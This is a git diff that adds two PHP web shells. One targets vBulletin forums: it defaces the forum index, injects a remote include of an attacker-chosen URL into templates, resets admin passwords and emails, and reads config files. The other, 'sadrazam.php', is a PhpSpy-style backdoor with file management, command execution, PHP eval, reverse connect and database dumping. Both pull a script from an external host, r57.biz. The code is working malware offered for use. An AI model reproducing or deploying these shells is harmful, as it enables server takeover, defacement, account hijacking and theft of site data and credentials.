+mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
+mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
+if ($pass == '')
+{
+$npass = 'NULL';
+} else {
+$npass = $pass;
+}
+echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
+?>
+<hr color="#00FF00" />
+<?
+$index = $_POST['b'];
+$Wdt = 'UPDATE `template` SET `template` = \' ' . $index . '  \'WHERE `title` =\'FORUMHOME\';';
+$Wdt2= 'UPDATE `style` SET `css` = \' ' . $index . ' \', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;';
+$result=mysql_query($Wdt);
+  if ($result) {echo "<p>Index was Changed Succefully</p>";}else{
+echo "<p>Failed to change index</p>";}
+$result1=mysql_query($Wdt2);
+if ($result1) {echo "<p>Done Create File</p>";} else{ echo "<p>Error</p>";}
+}
+
+if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="inc"  && isset($_POST['link']))
+{
+$host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+$vblink = $_POST['link'];
+mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
+mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
+if ($pass == '')
+{
+$npass = 'NULL';
+} else {
+$npass = $pass;
+}
+echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
+?>
+<hr color="#00FF00" />
+<?
+$hack15 = 'UPDATE `template` SET `template` = \'$spacer_open
+{${include(\'\'' . $vblink . '\'\')}}{${exit()}}&
+$_phpinclude_output\'WHERE `title` =\'FORUMHOME\';';
+$hack= 'UPDATE `style` SET `css` = \'$spacer_open
+{${include(\'\'' . $vblink .'\'\')}}{${exit()}}&
+$_phpinclude_output\', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;';
+$result=mysql_query($hack15) or die(mysql_error());
+$result=mysql_query($hack) or die(mysql_error());
+}
+if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="mail"  && isset($_POST['vbuser'])  && isset($_POST['vbmail']))
+{
+ $host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+$vbuser = $_POST['vbuser'];
+$vbmail = $_POST['vbmail'];
+mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
+mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
+if ($pass == '')
+{
+$npass = 'NULL';
+} else {
+$npass = $pass;
+}
+echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
+?>
+<hr color="#00FF00" />
+<?
+$query = 'update user set email="' . $vbmail . '" where username="' . $vbuser . '";';
+$re = mysql_query($query);
+if ($re)
+{
+echo '<font size=3><font color=yellow>The E-MAIL of the user </font><font color=red>' . $vbuser . '</font><font color=yellow> was changed to </font><font color=red>' . $vbmail . '</font><br>Back to <a href="?">Shell</a></font>';
+} else {
+echo '<font size=3><font color=red>Failed to change E-MAIL</font></font>';
+}
+}
+if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="psw"  && isset($_POST['vbuser'])  && isset($_POST['vbpass']))
+{
+$host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+$vbuser = $_POST['vbuser'];
+$vbpass = $_POST['vbpass'];
+mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
+mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
+if ($pass == '')
+{
+$npass = 'NULL';
+} else {
+$npass = $pass;
+}
+echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
+?>
+<hr color="#00FF00" />
+<?
+$query = 'select * from user where username="' . $vbuser . '";';
+$result = mysql_query($query);
+while ($row = mysql_fetch_array($result))
+{
+$salt = $row['salt'];
+$x = md5($vbpass);
+$x =$x . $salt;
+$pass_salt = md5($x);
+$query = 'update user set password="' . $pass_salt . '" where username="' . $vbuser . '";';
+$re = mysql_query($query);
+if ($re)
+{
+echo '<font size=3><font color=yellow>The pass of the user </font><font color=red>' . $vbuser . '</font><font color=yellow> was changed to </font><font color=red>' . $vbpass . '</font><br>Back to <a href="?">Shell</a></font>';
+} else {
+echo '<font size=3><font color=red>Failed to change PassWord</font></font>';
+}
+}
+}
+if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="login")
+{
+$host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
+mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
+if ($pass == '')
+{
+$npass = 'NULL';
+} else {
+$npass = $pass;
+}
+echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
+?>
+<hr color="#00FF00" />
+<form name="changepass" action="?act=psw" method="post">
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime">
+<th>:::::Change User Password:::::</th><th><input type="submit" name="Change" value="Change" /></th>
+<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
+<tr><td>Pass : </td><td><input name="vbpass" value="egy spider" /></td></tr>
+</table>
+<?
+echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
+?>
+</form>
+<hr color="#00FF00" />
+<form name="changepass" action="?act=mail" method="post">
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime">
+<th>:::::Change User E-MAIL:::::</th><th><input type="submit" name="Change" value="Change" /></th>
+<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
+<tr><td>MAIL : </td><td><input name="vbmail" value="egy_spider@hotmail.com" /></td></tr>
+</table>
+<?
+echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
+?>
+</form>
+<hr color="#00FF00" />
+<form name="changepass" action="?act=del" method="post">
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime">
+<th>:::::Delete a user:::::</th><th><input type="submit" name="Change" value="Change" /></th>
+<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
+</table>
+<?
+echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
+?>
+</form>
+<hr color="#00FF00" />
+<form name="changepass" action="?act=inc" method="post">
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime">
+<th>:::::Change Index by Inclusion(Not PL(Al-Massya)):::::</th><th><input type="submit" name="Change" value="Change" /></th>
+<tr><td>Index Link : </td><td><input name="link" value="http://www.egyspider.com/hacked.html" /></td></tr>
+</table>
+<?
+echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
+?>
+</form>
+<hr color="#00FF00" />
+<form name="changepass" action="?act=code" method="post">
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime">
+<th>:::::Change Index by Code(All Edition):::::</th><th><input type="submit" name="Change" value="Change" /></th>
+<tr><td>Index Code : </td><td><textarea name="code" cols=60 rows=20></textarea></td></tr>
+</table>
+<?
+echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
+?>
+</form>
+<hr color="#00FF00" />
+<form name="changepass" action="?act=shell" method="post">
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime">
+<th>:::::Inject FileInclusion Exploit(NOT PL(AL-MASSYA)):::::</th><th><input type="submit" name="Change" value="Change" /></th>
+<tr><td>Variable : </td><td><input name="var" value="shell" /></td></tr>
+</table>
+<?
+echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
+?>
+</form>
+<?
+}
+if ($act == ''){
+?>
+<form name="myform" action="?act=login" method="post">
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime">
+<th>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect" /></th><tr><td>Host : </td><td><input name="host" value="localhost" /></td></tr>
+<tr><td>User : </td><td><input name="user" value="root" /></td></tr>
+<tr><td>Pass : </td><td><input name="pass" value="" /></td></tr>
+<tr><td>Name : </td><td><input name="db" value="vb" /></td></tr>
+</table>
+</form>
+
+<?
+}
+if ($act == 'lst' && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['host']) && isset($_POST['db']))
+{
+$host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
+mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
+if ($pass == '')
+{
+$npass = 'NULL';
+} else {
+$npass = $pass;
+}
+echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
+?>
+<hr color="#00FF00" />
+<?
+$re = mysql_query('select * from user');
+echo'<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime"><th>ID</th><th>USERNAME</th><th>EMAIL</th>';
+while ($row = mysql_fetch_array($re))
+{
+echo'<tr><td>' . $row['userid'] . '</td><td>' . $row['username'] . '</td><td>' . $row['email'] . '</td></tr>';
+}
+echo'</table>';
+?>
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime"><th><?
+$count = mysql_num_rows($re);
+echo 'Number of users registered is : [ ' . $count . ' ]';
+ ?></th></table>
+<?
+}
+if ($act == 'users'){
+?>
+ <form name="myform" action="?act=lst" method="post">
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime">
+<th>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect" /></th><tr><td>Host : </td><td><input name="host" value="localhost" /></td></tr>
+<tr><td>User : </td><td><input name="user" value="root" /></td></tr>
+<tr><td>Pass : </td><td><input name="pass" value="" /></td></tr>
+<tr><td>Name : </td><td><input name="db" value="vb" /></td></tr>
+</table>
+</form>
+<?
+}
+if ($act=='config')
+{
+?>
+<form name="myform" action="?act=reconfig" method="post">
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime">
+<th>:::::CONFIG PATH:::::</th><th><input type="submit" name="Connect" value="Read" /></th>
+<tr><td>PATH : </td><td><input name="path" value="/home/hacked/public_html/vb/includes/config.php" /></td></tr></table></form>
+<?
+}
+if ($act=='index')
+{
+// Index Editor<HTML Editor>
+?>
+<script language='javascript'>
+function link(){
+var X = prompt("EnterText","")
+if (X=="" | X==null ) {
+return;
+}
+var y = prompt("Enterlink","")
+if (y=="" | y==null ) {
+return;
+}
+
+indexform.index.value=indexform.index.value + "<a href=" + y +">"+X+"</a>";
+
+}
+
+function right(){
+var X = prompt("Enter Text","")
+if (X=="" | X==null ) {
+return;
+}
+indexform.index.value=indexform.index.value + "<p align='right'>"+X+"</p>";
+
+}
+function left(){
+var X = prompt("Enter Text","")
+if (X=="" | X==null ) {
+return;
+}
+indexform.index.value=indexform.index.value + "<p align='left'>"+X+"</p>";
+
+}
+function center(){
+var X = prompt("Enter Text","")
+if (X=="" | X==null ) {
+return;
+}
+indexform.index.value=indexform.index.value + "<center>"+X+"</center>";
+
+}
+function colour(){
+var X = prompt("EnterText","")
+if (X=="" | X==null ) {
+return;
+}
+var y = prompt("EnterColour","")
+if (y=="" | y==null ) {
+return;
+}
+
+indexform.index.value=indexform.index.value + "<font color=" + y +">"+X+"</font>";
+
+}
+function b(){
+var X = prompt("Enter Text","")
+if (X=="" | X==null ) {
+return;
+}
+indexform.index.value=indexform.index.value + "<B>"+X+"</B>";
+
+}
+function u(){
+var X = prompt("Enter Text","")
+if (X=="" | X==null ) {
+return;
+}
+indexform.index.value=indexform.index.value + "<U>"+X+"</U>";
+
+}
+function i(){
+var X = prompt("Enter Text","")
+if (X=="" | X==null ) {
+return;
+}
+indexform.index.value=indexform.index.value + "<I>"+X+"</I>";
+
+}
+function mar(){
+var X = prompt("Enter Text","")
+if (X=="" | X==null ) {
+return;
+}
+indexform.index.value=indexform.index.value + "<marquee>"+X+"</marquee>";
+
+}
+function img(){
+var X = prompt("Enter link","")
+if (X=="" | X==null ) {
+return;
+}
+indexform.index.value=indexform.index.value + "<img src='"+X+"'></img>";
+
+}
+function br(){
+indexform.index.value=indexform.index.value + "<br>";
+
+}
+</script>
+<table border="1" bordercolor="#008000" bordercolordark="#008000"
+bordercolorlight="#008000"><th><a onclick='return center()'>Center</a> ||| <a onclick='return left()'>Left</a> ||| <a onclick='return right()'>right</a> ||| <a onclick='return b()'>Bold</a> ||| <a onclick='return u()'>UnderLine</a> ||| <a onclick='return i()'>Italic</a> ||| <a onclick='return br()'>NewLine</a> ||| <a onclick='return colour()'>Colour</a> ||| <a onclick='return mar()'>Marquee ||| <a onclick='return img()'>Picture</a> ||| <a onclick='return link()'>Link</a></a></th><tr><TD>
+<center><form name="indexform" action="" method="post"><textarea name='index' rows='14' cols='86'></textarea></p>
+</form></form></center>
+<SCRIPT SRC=http://www.r57.biz/yazciz/ciz.js></SCRIPT>
+</TD></tr><tr><td>Copy The Code after Finishing your index</td></tr></table>
+<?
+}
+?>
+<hr color="#00FF00" />
+<table border="1" bgcolor="#000000" bordercolor="lime"
+bordercolordark="lime" bordercolorlight="lime"><tr><td><a href="?">Main Shell</a></td><td><a href="?act=users">List Users</a></td><td><a href="?act=index">Index Maker</a></td><td><a href="?act=config">ReadConfig</a></td></tr></table>
+<p align="center">www.egyspider.com</p>
+<DIV id="n" align="center">
+  <TABLE borderColor="#111111" cellSpacing="0" cellPadding="0" width="100%" border="1">
+    <TBODY>
+      <TR>
+        <TD width="100%"><p align="center"><STRONG>o---[ r57.biz | | <A egy_spider@hotmail.com>egy_spider@hotmail.com</A> |developer by egy spider   (ahmed rageh) ]---o</STRONG></p></TD>
+      </TR>
+    </TBODY>
+  </TABLE>
+</DIV>
+</center> 
+ </body>
+</html>
\ No newline at end of file
diff --git a/php/sadrazam.php b/php/sadrazam.php
new file mode 100644
index 0000000..4369d8b
--- /dev/null
+++ b/php/sadrazam.php
@@ -0,0 +1,1973 @@
+<?php
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach(array('_GET','_POST') as $_request) {
+	foreach($$_request as $_key => $_value) {
+		if ($_key{0} != '_') {
+			if (IS_GPC) {
+				$_value = s_array($_value);
+			}
+			$$_key = $_value;
+		}
+	}
+}
+
+/*===================== ||-&#1028;+&#1092;+| =====================*/
+$admin = array();
+// -|+&#1105;-&#1096;-&#1082;|#-&#1099;-&#1097;+&#1076;, true +&#1082;-&#1096;-&#1082;-&#1097;+&#1076;, false +&#1082;+#+++ +&#1099;.--|&#1094;-&#1073;-&#1102;+&#1028;+|-&#1079;
+$admin['check'] = 0;
+// +&#1095;| -&#1096;-&#1082;|#-&#1099;-&#1097;+&#1076;,|&#1099;-|+-||-+|#-&#1099;
+$admin['pass']  = 'angel';
+
+//+&#1095;- |+ cookie +&#1118;+|+|+&#1079;+-|+-&#1090;-&#1082;|&#1108;, +&#1028;||-+#++ |&#1075;, |&#1099;-|+---|&#1094;#&#1092;-+, +&#1105;+&#1028;|&#1099;#&#1075;|+-&#1084;+-
+// cookie |#+|
+$admin['cookiepre'] = '';
+// cookie +&#1118;+|+&#1028;
+$admin['cookiedomain'] = '';
+// cookie +&#1118;+|-++|
+$admin['cookiepath'] = '/';
+// cookie +--&#1079;|+
+$admin['cookielife'] = 86400;
+/*===================== +&#1092;+|+&#1089;-  =====================*/
+
+if ($charset == 'utf8') {
+	header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+	header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+	header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+	header("content-Type: text/html; charset=iso-8859-2");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== +&#1101;+|-&#1097;+&#1076; =====================*/
+if ($action == "logout") {
+	scookie('phpspypass', '', -86400 * 365);
+	p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+	p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+	exit;
+}
+if($admin['check']) {
+	if ($doing == 'login') {
+		if ($admin['pass'] == $password) {
+			scookie('phpspypass', $password);
+			p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+			p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+			exit;
+		}
+	}
+	if ($_COOKIE['phpspypass']) {
+		if ($_COOKIE['phpspypass'] != $admin['pass']) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== -&#1097;+&#1076;+&#1089;-  =====================*/
+
+$errmsg = '';
+
+// #&#1097;+|PHPINFO
+if ($action == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+	} else {
+		$errmsg = 'phpinfo() function has non-permissible';
+	}
+}
+
+// --+++-+ 
+if ($doing == 'downfile' && $thefile) {
+	if (!@file_exists($thefile)) {
+		$errmsg = 'The file you want Downloadable was nonexistent';
+	} else {
+		$fileinfo = pathinfo($thefile);
+		header('Content-type: application/x-'.$fileinfo['extension']);
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.filesize($thefile));
+		@readfile($thefile);
+		exit;
+	}
+}
+
+// +#++--++#++|- +|+&#1090;
+if ($doing == 'backupmysql' && !$saveasfile) {
+	dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+	$table = array_flip($table);
+	$result = q("SHOW tables");
+	if (!$result) p('<h2>'.mysql_error().'</h2>');
+	$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
+	header('Content-type: application/unknown');
+	header('Content-Disposition: attachment; filename='.$filename);
+	$mysqldata = '';
+	while ($currow = mysql_fetch_array($result)) {
+		if (isset($table[$currow[0]])) {
+			$mysqldata .= sqldumptable($currow[0]);
+		}
+	}
+	mysql_close();
+	exit;
+}
+
+// -&#1080;| MYSQL--+++-+ 
+if($doing=='mysqldown'){
+	if (!$dbname) {
+		$errmsg = 'Please input dbname';
+	} else {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		if (!file_exists($mysqldlfile)) {
+			$errmsg = 'The file you want Downloadable was nonexistent';
+		} else {
+			$result = q("select load_file('$mysqldlfile');");
+			if(!$result){
+				q("DROP TABLE IF EXISTS tmp_angel;");
+				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
+				//+|-#+&#1092;|-+|#&#1101;-+++|-,##|&#1090;|&#1038;-+|-+&#1073;+++&#1101;+&#1028;# |&#1084;__angel_1111111111_eof__|-+-+ -##+-&#1098;+ |-|&#1097;+&#1038;
+				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
+				$result = q("select content from tmp_angel");
+				q("DROP TABLE tmp_angel");
+			}
+			$row = @mysql_fetch_array($result);
+			if (!$row) {
+				$errmsg = 'Load file failed '.mysql_error();
+			} else {
+				$fileinfo = pathinfo($mysqldlfile);
+				header('Content-type: application/x-'.$fileinfo['extension']);
+				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+				header("Accept-Length: ".strlen($row[0]));
+				echo $row[0];
+				exit;
+			}
+		}
+	}
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo str_replace('.','','SadrazaM | Casus Shell');?></title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+</style>
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+<script type="text/javascript">
+function CheckAll(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function goaction(act){
+	$('goaction').action.value=act;
+	$('goaction').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><a href="http://www.r57.biz" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> Ver: 2010 </a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
+			<a href="javascript:goaction('logout');">C&#305;k&#305;s</a> |
+			<a href="javascript:goaction('file');">File Manager</a> |
+			<a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
+			<a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> |
+			<a href="javascript:goaction('shell');">Komut Cal&#305;st&#305;r</a> |
+			<a href="javascript:goaction('phpenv');">PHP Variable</a> |
+			<a href="javascript:goaction('eval');">Eval PHP Code</a>
+			<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+
+formhead(array('name'=>'goaction'));
+makehide('action');
+formfoot();
+
+$errmsg && m($errmsg);
+
+// +&#1105;+&#1073;|#|#-++|
+!$dir && $dir = '.';
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+	$dir = $dir.'/';
+}
+$uedir = ue($dir);
+
+if (!$action || $action == 'file') {
+
+	// +-|-|--||&#1097;+&#1038;
+	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+	// ++| -+-+
+	if ($doing == 'deldir' && $thefile) {
+		if (!file_exists($thefile)) {
+			m($thefile.' directory does not exist');
+		} else {
+			m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
+		}
+	}
+
+	// ||+&#1080;-+-+
+	elseif ($newdirname) {
+		$mkdirs = $nowpath.$newdirname;
+		if (file_exists($mkdirs)) {
+			m('Directory has already existed');
+		} else {
+			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+			@chmod($mkdirs,0777);
+		}
+	}
+
+	// +-|&#1083;+-+ 
+	elseif ($doupfile) {
+		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+	}
+
+	// #&#1088;+&#1085;+-+ 
+	elseif ($editfilename && $filecontent) {
+		$fp = @fopen($editfilename,'w');
+		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+
+	// #&#1088;+&#1085;+-+ -&#1031;-+
+	elseif ($pfile && $newperm) {
+		if (!file_exists($pfile)) {
+			m('The original file does not exist');
+		} else {
+			$newperm = base_convert($newperm,8,10);
+			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+		}
+	}
+
+	// +-| 
+	elseif ($oldname && $newfilename) {
+		$nname = $nowpath.$newfilename;
+		if (file_exists($nname) || !file_exists($oldname)) {
+			m($nname.' has already existed or original file does not exist');
+		} else {
+			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+		}
+	}
+
+	// +|+|+-+ 
+	elseif ($sname && $tofile) {
+		if (file_exists($tofile) || !file_exists($sname)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+		}
+	}
+
+	// +--&#1073;-#+&#1092;
+	elseif ($curfile && $tarfile) {
+		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			$time = @filemtime($tarfile);
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ++|&#1080;-&#1093;-#+&#1092;
+	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+		if (!@file_exists($curfile)) {
+			m(basename($curfile).' does not exist');
+		} else {
+			$time = strtotime("$year-$month-$day $hour:$minute:$second");
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// |&#1028;# --++
+	elseif($doing == 'downrar') {
+		if ($dl) {
+			$dfiles='';
+			foreach ($dl as $filepath => $value) {
+				$dfiles.=$filepath.',';
+			}
+			$dfiles=substr($dfiles,0,strlen($dfiles)-1);
+			$dl=explode(',',$dfiles);
+			$zip=new PHPZip($dl);
+			$code=$zip->out;
+			header('Content-type: application/octet-stream');
+			header('Accept-Ranges: bytes');
+			header('Accept-Length: '.strlen($code));
+			header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
+			echo $code;
+			exit;
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	// + -+++| +-+ 
+	elseif($doing == 'delfiles') {
+		if ($dl) {
+			$dfiles='';
+			$succ = $fail = 0;
+			foreach ($dl as $filepath => $value) {
+				if (@unlink($filepath)) {
+					$succ++;
+				} else {
+					$fail++;
+				}
+			}
+			m('Deleted file have finished&#1075;&#1084;choose '.count($dl).' success '.$succ.' fail '.$fail);
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	//#++&#1118;-&#1098;#-
+	formhead(array('name'=>'createdir'));
+	makehide('newdirname');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileperm'));
+	makehide('newperm');
+	makehide('pfile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'copyfile'));
+	makehide('sname');
+	makehide('tofile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'rename'));
+	makehide('oldname');
+	makehide('newfilename');
